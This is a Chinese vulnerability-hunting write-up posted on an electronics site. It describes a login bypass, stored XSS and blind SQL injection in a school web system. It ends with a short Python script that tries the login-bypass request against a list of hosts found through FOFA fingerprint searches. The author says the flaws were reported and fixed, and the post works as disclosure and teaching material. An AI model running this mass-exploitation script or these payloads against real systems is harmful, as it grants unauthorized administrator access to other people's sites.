实战记录：EDU网站漏洞通杀全过程

菜鸟学安全 2024-04-08 1110

电子说

1.3w人已加入

描述

一、漏洞挖掘

1、逻辑缺陷

熟悉的页面，熟悉的弱口令测试，但无果

SQL

我就把目光转向js审计，果不其然有新发现，可以根据账号自动登录

SQL

于是直接构造请求绕过登录

SQL

经典的管理员权限

2、存储型XSS

寻找文本输入

SQL

浅析：前端：这里的标签都是普通标签，没有像RCDATA元素(RCDATA elements)，有和<title>，会做一次HTML编码，所以可以直接插入危险的js代码。后端：没有任何过滤（xs~</p> <p align="center"> <img src='https://file1.elecfans.com/web2/M00/C7/5C/wKgZomYTWW6ADPvCAACjs_sNLsc382.jpg' alt='SQL' /></p> <p style="text-indent:2em;"> 所以就简单了，直接插入<script>alert('1')</script>即可</p> <p align="center"> <img src='https://file1.elecfans.com/web2/M00/C7/5C/wKgZomYTWW6ASE9lAACFPGdfuOA160.jpg' alt='SQL' /></p> <p style="text-indent:2em;"> 3、SQL注入</p> <p align="center"> <img src='https://file1.elecfans.com/web2/M00/C7/5C/wKgZomYTWW6AJY5UAACg8NjmVGM838.jpg' alt='SQL' /></p> <p style="text-indent:2em;"> 测试无果</p> <p align="center"> <img src='https://file1.elecfans.com/web2/M00/C7/5C/wKgZomYTWW-AZhiMAACZZUkCVdE148.jpg' alt='SQL' /></p> <p style="text-indent:2em;"> 最后发现注入点在第一个函数，果然任何一个输入点都可能是不安全的，是布尔型盲注</p> <p align="center"> <img src='https://file1.elecfans.com/web2/M00/C7/5C/wKgZomYTWW-AVdoBAADQYAsbLw8267.jpg' alt='SQL' /></p> <p style="text-indent:2em;"> 后面就是经典Sqlmap了</p> <p align="center"> <img src='https://file1.elecfans.com/web2/M00/C7/5C/wKgZomYTWW-AbrESAABykGIupuE180.jpg' alt='SQL' /></p> <p style="text-indent:2em;"> <strong>二、继续通杀</strong></p> <p style="text-indent:2em;"> 根据系统指纹在fofa上搜索："xx系统" && icon_hash="11xxxx"有32个IP，看了下，有重复的</p> <p align="center"> <img src='https://file1.elecfans.com/web2/M00/C7/5D/wKgZomYTWW-AQpGcAAA0WXRh4ow523.jpg' alt='SQL' /></p> <p style="text-indent:2em;"> 使用fofa_viewer导出目标这里我根据第一个逻辑漏洞的漏洞指纹信息，写了一个简单poc</p> <p style="text-indent:2em;"> </p> <p style="text-indent:2em;"> </p> <pre> import requests def poc(url): poc_url = url + '/login/doautologin.edu' data = {'um.userid': "admin"} try: res = requests.post(poc_url, data=data, timeout=5) if (res.headers.get("Set-Cookie")): # 登录成功就会set-cookie print(url + '/login.html') except BaseException: pass if __name__ == '__main__': with open('url.txt', 'r') as f: for i in f: poc(i.rstrip(' ')) </pre> <p> </p> <p style="text-indent:2em;"> </p> <p style="text-indent:2em;"> 以上漏洞均已报告给相应学校且已修复</p> <p style="text-indent:2em;"> <strong>三、思考总结</strong></p> <p style="text-indent:2em;"> 1）在访问系统当中的时候F12查看源码是一个不错的习惯（尤其是有前端弹框的）</p> <p style="text-indent:2em;"> 2）前端代码的一切展示行为完全可控(一定要理解这句话)</p> <p style="text-indent:2em;"> 3）了解程序的底层逻辑，你才能更清晰的知道每一个参数的意义</p> <p style="text-indent:2em;"> 本文作者：B0ther</p> <p style="text-indent:2em;"> 审核编辑：黄飞</p>  <script type="application/ld+json"> { "@context": "https://zhanzhang.baidu.com/contexts/cambrian.jsonld", "@id": "https://m.elecfans.com/article/2662155.html", "title": "实战记录：EDU网站漏洞通杀全过程", "images": [ "https://file1.elecfans.com/web2/M00/C8/42/wKgaomYTWW2APqtEAAAHUOIV7y0400.jpg" ], "description": "浅析：前端：这里的标签都是普通标签，没有像RCDATA元素(RCDATA elements)，有<textarea>和<title>，会做一次HTML编码，所以可以直接插入危险的js代码。后端：没有任何过滤（xs~", "pubDate": "2024-04-08T10:39:51" } </script>  </div>   <span class="open_app_arc baidu_click_tongji2 downAppBtn inAppHide">打开APP阅读更多精彩内容</span> <div class="see_more_arc hide"> <div class="arrow_more show_more"> <i></i> <i></i> </div> <button class="read_more">点击阅读全文</button> </div> </div> </div>  <div class="statement"> 声明：本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人，不代表电子发烧友网立场。文章及其配图仅供工程师学习之用，如有内容侵权或者其他违规问题，请联系本站处理。 <a class="complaint handleJumpBy" href="/about/tousu.html" target="_self">举报投诉</a> </div>  <div class="arc_comment comment"> </div>  <div class="openx-hero inAppHide" style="text-align: center;"> <div class="advertWrap"> <a href="" target="_blank"> <img src=""> </a> </div> </div> <div class="rela_article"> <div class="rela_article_title flex"> <ul class="tab_lis flex"> <li><span>相关推荐</span></li> <li><a href="/tags/SQL.html" target="_self" class="handleJumpBy advertTagId" data-id="5877">SQL</a></li><li><a href="/tags/安全漏洞.html" target="_self" class="handleJumpBy advertTagId" data-id="103234">安全漏洞</a></li><li><a href="/tags/edu.html" target="_self" class="handleJumpBy advertTagId" data-id="174130">edu</a></li> </ul> </div> <ul class="rela_article_content"> <li > <a href="https://bbs.elecfans.com/jishu_154212_1_1.html" target="_self" class="handleJumpBy"> <div class="rela_article_ct">笔记本组装<b class='flag-m-1'>全过程</b>图解.pdf</div> <div class="time_and_hot flex"> <span>2010-12-26</span> <span>0</span> </div> </a> </li><li > <a href="https://bbs.elecfans.com/jishu_239370_1_1.html" target="_self" class="handleJumpBy"> <div class="rela_article_ct">热转印电路板制作<b class='flag-m-1'>全过程</b></div> <div class="time_and_hot flex"> <span>2012-06-24</span> <span>0</span> </div> </a> </li><li > <a href="https://bbs.elecfans.com/jishu_257941_1_1.html" target="_self" class="handleJumpBy"> <div class="rela_article_ct">PCB 制作<b class='flag-m-1'>全过程</b></div> <div class="time_and_hot flex"> <span>2012-08-05</span> <span>0</span> </div> </a> </li><li > <a href="https://bbs.elecfans.com/jishu_265728_1_1.html" target="_self" class="handleJumpBy"> <div class="rela_article_ct">音箱制作<b class='flag-m-1'>全过程</b></div> <div class="time_and_hot flex"> <span>2012-08-16</span> <span>0</span> </div> </a> </li><li > <a href="https://bbs.elecfans.com/jishu_435917_1_1.html" target="_self" class="handleJumpBy"> <div class="rela_article_ct">有人分享制作蓝牙耳机的<b class='flag-m-1'>全过程</b>吗？</div> <div class="time_and_hot flex"> <span>2014-06-02</span> <span>0</span> </div> </a> </li><li > <a href="https://bbs.elecfans.com/jishu_488502_1_1.html" target="_self" class="handleJumpBy"> <div class="rela_article_ct">菜鸟制作51避障小车<b class='flag-m-1'>全过程</b><b class='flag-m-1'>记录</b></div> <div class="time_and_hot flex"> <span>2015-06-18</span> <span>0</span> </div> </a> </li><li > <a href="https://www.elecfans.com/soft/165/2009/2009092247648.html" target="_self" class="handleJumpBy"> <div class="rela_article_ct">CPU制造<b class='flag-m-1'>全过程</b></div> <div class="time_and_hot flex"> <span>2009-09-22</span> <span>930</span> </div> </a> </li><li > <a href="https://www.elecfans.com/soft/video/2010/2010091489419.html" target="_self" class="handleJumpBy"> <div class="rela_article_ct">组装电脑<b class='flag-m-1'>全过程</b>视频教程</div> <div class="time_and_hot flex"> <span>2010-09-14</span> <span>2033</span> </div> </a> </li><li > <a href="https://www.elecfans.com/soft/qichedianzi/2016/0803/429993.html" target="_self" class="handleJumpBy"> <div class="rela_article_ct">DIY安装导航+可视倒车+行车<b class='flag-m-1'>记录</b>+GPS跟踪<b class='flag-m-1'>全过程</b></div> <div class="time_and_hot flex"> <span>2016-08-03</span> <span>1917</span> </div> </a> </li><li > <a href="https://www.elecfans.com/soft/6/2021/202105261623095.html" target="_self" class="handleJumpBy"> <div class="rela_article_ct">用C语言开发DSP系统的<b class='flag-m-1'>全过程</b>的讲解</div> <div class="time_and_hot flex"> <span>2021-05-26</span> <span>910</span> </div> </a> </li><li > <a href="https://www.elecfans.com/soft/22/163/2021/202106191642114.html" target="_self" class="handleJumpBy"> <div class="rela_article_ct">手工制作pcb<b class='flag-m-1'>全过程</b></div> <div class="time_and_hot flex"> <span>2021-06-19</span> <span>2107</span> </div> </a> </li><li > <a href="https://www.elecfans.com/d/1755399.html" target="_self" class="handleJumpBy"> <div class="rela_article_ct">芯片制造<b class='flag-m-1'>全过程</b></div> <div class="time_and_hot flex"> <span>2021-12-08</span> <span>11688</span> </div> </a> </li><li > <a href="https://www.elecfans.com/soft/70/2022/202201071774655.html" target="_self" class="handleJumpBy"> <div class="rela_article_ct">电磁炉的维修<b class='flag-m-1'>全过程</b>分享</div> <div class="time_and_hot flex"> <span>2022-01-10</span> <span>1382</span> </div> </a> </li><li > <a href="https://www.elecfans.com/soft/Mec/2023/202311182314195.html" target="_self" class="handleJumpBy"> <div class="rela_article_ct">用C语言开发DSP系统<b class='flag-m-1'>全过程</b></div> <div class="time_and_hot flex"> <span>2023-11-18</span> <span>236</span> </div> </a> </li><li > <a href="https://www.elecfans.com/soft/Mec/2023/202311182314205.html" target="_self" class="handleJumpBy"> <div class="rela_article_ct">用C语言开发DSP系统的<b class='flag-m-1'>全过程</b>讲解</div> <div class="time_and_hot flex"> <span>2023-11-18</span> <span>258</span> </div> </a> </li> </ul> </div> <div class="go_elecfans ad-demo inAppHide"></div>  <div class="all-comment comment"> <div class="all-comment-content"> <div class="all-com-close flex"> <p class="ph">全部<i>0</i>条评论</p> <span class="close_com"></span>  </div> <div class="all_words comment_content" id="all_words"> <div id="scroller"></div> </div> <div class="all_no_comment" class="hide"> <img src="https://staticm.elecfans.com/images/newdetail/all_no_bg.png" alt=""> <p>快来发表一下你的评论吧 !</p> </div> </div> <div class="ft"> <input type="text" placeholder="发评论" maxlength="10000"> <button>发送</button> </div> </div> <input type="hidden" id="cover_desc" value=" 一、漏洞挖掘 1、逻辑缺陷熟悉的页面，熟悉的弱口令测试，但无果我就把目光转向js审计，果不其然有新发现，可以根据账号自动登录于是直接构造请求绕过登录经典的管理员权限 2、存储型XSS 寻找文本输入浅析：前端：这里的标签都是普通标签，没有像RCDATA元素(RCDATA elements)，有和，会做一次HTML编码，所以可以直接插入危险的js代码。后端：没有任何过滤（xs~ 所以就简单"> <input type="hidden" id="current_url" value="https://m.elecfans.com/article/2662155.html"> <input type="hidden" id="title" value="实战记录：EDU网站漏洞通杀全过程"> <input type="hidden" id="pc_domain" value="https://www.elecfans.com"> <input type="hidden" id="aid" value="2662155"> <input type="hidden" id="pid" value="">  <input type="hidden" id="column_uid" value="5699571">  <input type="hidden" id="evip_article_id" value="">  <input type="hidden" id="store_flag" value="13"> <input type="hidden" id="evip_type" value="0">  <input type="hidden" id="evip_id" value="0">   <footer class="art_footer flex"> <input type="text" placeholder="发评论" maxlength="10000" id="commentTxt"> <div class="flex"> <span class="ft_comment" data-com="发评论"> <i class="sups"></i> </span> <span class="ft_give_up ">  </span> <span class="ft_star ">  </span> <span class="ft_share btn-createCover"></span> </div> </footer> <div class="login-reg-fixed inAppHide" data-uid="0"> <a href="/login.html" class="login-reg-btn"> 登录/注册 </a> </div>  <img src="" alt="" id="qrious" style="display: none;">  <div class="new-footer inAppHide"> <div class="flex-center"><a href="https://www.elecfans.com/app/download.html" target="_blank">下载APP</a></div> <div class="flex-center"> <a href="/login.html" class="login-reg-btn"> 登录注册 </a> <span class="line">|</span><a href="https://m.elecfans.com/about/tousu.html">投诉反馈</a><span class="line">|</span><a href="https://author.baidu.com/home/1563378682824805?from=dusite_artdetailh5">电子发烧友网</a> </div> <div class="flex-center">© 2021 elecfans.com</div> <div class="flex-center"><a href="https://beian.miit.gov.cn/">湘ICP备2023018690号</a></div> <div><input type="hidden" value="0" name="arc_relate_vid"></div> </div> </div>  <input type="hidden" id="shareWxImg" value="https://file1.elecfans.com/web2/M00/C8/42/wKgaomYTWW2APqtEAAAHUOIV7y0400.jpg">  <script> /** * 判断是否微信浏览器 * @return {Boolean} [description] */ function is_weixin() { var ua = navigator.userAgent.toLowerCase(); if (ua.match(/MicroMessenger/i) == "micromessenger") { return true; } else { return false; } } $(function () { $(window).scroll(function (e) { var window_w = window.innerWidth || document.documentElement.clientWidth || document.body.clientWidth; var window_h = window.innerHeight || document.documentElement.clientHeight || document.body.clientHeight; if (document.body.scrollTop + document.documentElement.scrollTop > window_h * 2) { $('.go_top').show(); } else { $('.go_top').hide(); } }); $('.go_top').on('click', function () { document.body.scrollTop = 0; document.documentElement.scrollTop = 0; return false; }); // 添加广告链接的Google Analytics事件跟踪 $('a').on('click', function () { var href = $(this).attr('href'); if (href) { var bannerArr = href.match(/__bannerid=(\d+)__/); var zoneidArr = href.match(/__zoneid=(\d+)__/); if ((bannerArr instanceof Array) && bannerArr.length == 2) { var bannerid = bannerArr[1]; var zoneid = zoneidArr[1]; ga('send', 'event', 'mElecfansAd', 'click', 'zoneid:' + zoneid + ',bannerid: ' + bannerid, 1); gtag('event', 'mElecfansAd', { 'zoneid': zoneid, 'bannerid': 'bannerid', 'describe': 'click' }); } } }); // 微信浏览器底部显示关注微信 /* if (is_weixin()) { $('#foot-fixed').hide(); $('#foot-fixed-wx').show(); }*/ $('#foot-img-wx-small').click(function () { $('#body-wx-big img').toggle(); }); }); </script>  <div class="perfect_infomation_tip"> <span class="no_tip_day3">×</span> <div class="perfect_infomation_tip_box go_perfect_btn"> <span class="tip_jifen_text">20</span> <div> <img class="tip_jifen" src="https://staticm.elecfans.com/images/tip_jifen.png"> </div> <div> 完善资料，<br>赚取积分 </div> </div> </div>  <script src="https://staticm.elecfans.com/weixinPrize/js/layer_mobile/layer.js"></script> <script src="https://staticm.elecfans.com/organizing/js/organizing.js?20230825" type="text/javascript" ></script> <script src="https://staticm.elecfans.com/hqAdvert.js?v2" type="text/javascript" ></script> <script src="https://staticm.elecfans.com/xgPlayer.js" type="text/javascript" ></script> <script> $(function(){ var scrollTimer $(window).on("scroll",function(){ //滚动的时候悬浮缩回去否则正常展示 $(".perfect_infomation_tip_box").css("right","0px") clearTimeout(scrollTimer); scrollTimer=setTimeout(function(){ $(".perfect_infomation_tip_box").css("right"," -70px"); },300) }) // 用户下载附件判断登录 $("a[data-annex]").click(function(){ if($("#uid").attr("data-uid")== "0" || !$("#uid").attr("data-uid")){ window.location.href="/login.html" }else{ var down_id= $(this).attr("data-annex"); var down_href= $('#'+down_id).val(); window.open(down_href); } return false }) /* //判断当天是否弹出手机验证如果弹出这 if(typeof isVerification_new === "function"){ if(window.localStorage.getItem("m_verification")!==newDate_current()){ //弹出是否手机验证 //弹出是否手机验证 isVerification_new(function(){ //完成手机号验证后判断是否完善资料 isPerfectInfo_phone($) }) } }*/ }); (function () { //百度推广 var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s); //add sunjinliang 2021.1.11 copy 原来的统计 var user_uname = $('input[name="column-type-name"]').val(); //发烧友增加百度统计自定义变量统计单一用户数据访问量 var _hmt = _hmt || []; if (_hmt && user_uname == '发烧友学院') { _hmt.push(['_setCustomVar', 1, 'ChannelID', '发烧友学院', 3]); } var google_title = user_uname; ga('send', { hitType: 'pageview', title: google_title, dimension0: 'Mobile' }); gtag('event', 'pageview', { 'title': google_title, 'dimension0': 'Mobile', 'describe': 'pageview' }); $(".baidu_click_tongji1").click(function(){ sendGA("头部") }) $(".baidu_click_tongji2").click(function(){ sendGA("中部") }) $(".baidu_click_tongji3").click(function(){ sendGA("尾部") }) function sendGA(content){ //向百度发送数据 if(typeof(_hmt)!="undefined"){ //时间分类===_trackEvent 详情专题页面==zt_detail 点击事件==='click' 哪一个部分点击（content）==== 头部中部尾部 _hmt.push(['_trackEvent', "zt_detail", 'click', content]); } } })(); </script> <script src="https://staticm.elecfans.com/artilePartjs.js?v=20230803160700" type="text/javascript" ></script> </body> </html>